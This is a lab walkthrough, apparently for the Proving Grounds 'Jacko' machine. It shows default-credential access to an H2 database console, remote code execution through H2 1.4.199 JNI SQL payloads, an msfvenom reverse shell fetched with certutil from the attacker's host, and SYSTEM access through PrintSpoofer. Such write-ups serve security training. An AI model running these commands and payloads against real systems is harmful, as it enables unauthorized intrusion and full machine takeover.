Jacko - OSPG
Read this in "about 6 minutes".
Summary Of Result
As enumerating, we discover a vulnerable H2 database with a default credentials running on the target system, which leads to Remote Code Execution. We can then escalate our privilege by abusing misconfigured SeImpersonatePrivilege token.
Attack Narrative
The attack is summed up within three stages:
- Enumeration.
- Exploitation.
- Administrative Privilege Escalation.
Enumeration
We will start with a nmap scan.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: H2 Database Engine (redirect)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
7680/tcp open tcpwrapped syn-ack ttl 127
8082/tcp open http syn-ack ttl 127 H2 database http console
|_http-favicon: Unknown favicon MD5: D2FBC2E4FB758DC8672CDEFB4D924540
| http-methods:
|_ Supported Methods: GET POST
|_http-title: H2 Console
- There are a few ports running on the target machine. However, the HTTP service on port 8082 really draws our attention.
H2 Database - Port 8082
Navigate to the website, we are redirected to a login page.
$ curl -s http://192.168.60.66:8082/login.jsp?jsessionid=67d97f9e84ff28caa571dba2a900edb3 | html2text 1 ⚙
[One of: Čeština/Deutsch/English/Español/Français/Magyar/한국어/Indonesia/
Italiano/日本語/Nederlands/Polski/Português (Brasil)/Português (Europeu)/русский/
Slovensky/Türkçe/Українська/中文 (简体)/中文 (繁體)] Preferences Tools Help
Login
[One of: Generic H2 (Embedded)/Generic H2 (Server)/Generic
Derby (Embedded)/Generic Derby (Server)/Generic HSQLDB/Generic
MySQL/Generic PostgreSQL/Generic MS SQL Server 2005/Generic MS
Saved Settings: SQL Server 2000/Generic Oracle/Generic DB2/Generic SQLite/
Generic Firebird Server/Generic Azure SQL/Generic Hive/Generic
Hive 2/Generic Impala/Generic Redshift/Generic Snowflake/
Generic Teradata/Generic JNDI Data Source]
Setting Name: [Generic H2 (Embedded)] [Unknown INPUT type] [Unknown INPUT
type]
==============================================================================
Driver Class: [org.h2.Driver ]
JDBC_URL: [jdbc:h2:~/test ]
User Name: [sa ]
Password: [********************]
[Connect] [Unknown INPUT type]
Testing some weak credentials: admin:admin, admin:password, root:root, or root:toor, but none of them really works out.
After a few researches, we discover that the web application using default credentials sar:(no password), which allows us to completely bypass the login portal, and logged in as web administrator.
More importantly, we also notice that the H2 database version is 1.4.199, which expose a critical vulnerability that ends up Remote Code Execution.
$ searchsploit H2 1.4.199
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
H2 Database 1.4.199 - JNI Code Execution | java/local/49384.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploitation
H2 Database Exploitation
- Following along the public exploit, we first use SQL syntax to create a DLL payload.
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "' [...] 'ISO-8859-1', '', '', '', '', ''); - Next, we will load the DLL payload.
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load"; CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll'); - Then, we craft a reverse shell using
msfvenom.$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.60 LPORT=80 -f exe -o WebIIS.exe 130 ⨯ 1 ⚙ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of exe file: 7168 bytes Saved as: WebIIS.exe - We host a web server to transfer our payload, and also set up a
nclistener to catch the reverse shell.- On the first terminal, execute the following command to host a web server on port 8082.
$ python3 -m http.server 8082 - On the second terminal, we kickoff a
nclistener on port 80.$ sudo nc -nlvp 80
- On the first terminal, execute the following command to host a web server on port 8082.
- Finally, we run the following payload to achieve command execution.
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -f -urlcache -split \"http://192.168.49.60:8082/WebIIS.exe\" \"C:\\Windows\\Temp\\WebIIS.exe\"").getInputStream()).useDelimiter("\\Z").next()');CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\Windows\\Temp\\WebIIS.exe").getInputStream()).useDelimiter("\\Z").next()');
If everything works properly, the reverse connection should be established at port 80 as tony.
nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.49.234] from (UNKNOWN) [192.168.234.66] 49770
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\H2\service>set PATH=%SystemRoot%\system32;%SystemRoot%;
set PATH=%SystemRoot%\system32;%SystemRoot%;
C:\Program Files (x86)\H2\service>whoami
whoami
jacko\tony
Administrative Privilege Escalation
A misconfigured privilege token is set for tony.
C:\Program Files (x86)\H2\service>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
...
SeImpersonatePrivilege Impersonate a client after authentication Enabled
...
We can abuse it to escalate our privilege with the support of PrintSpoofer.
All we have to do is finding a way to transfer PrintSpoofer to the target system. This can be done with certutil utility.
C:\Program Files (x86)\H2\service>certutil -f -urlcache -split "http://192.168.49.234:8082/PrintSpoofer64.exe" "C:\\Windows\\Temp\\PrintSpoofer64.exe"
;certutil -f -urlcache -split "http://192.168.49.234:8082/PrintSpoofer64.exe" "C:\\Windows\\Temp\\PrintSpoofer64.exe"
**** Online ****
0000 ...
6a00
CertUtil: -URLCache command completed successfully.
As the file is successfully transfered, we execute the following command …
C:\Program Files (x86)\H2\service>C:\\Windows\\Temp\\PrintSpoofer64.exe -i -c cmd
C:\\Windows\\Temp\\PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
and become Administrator.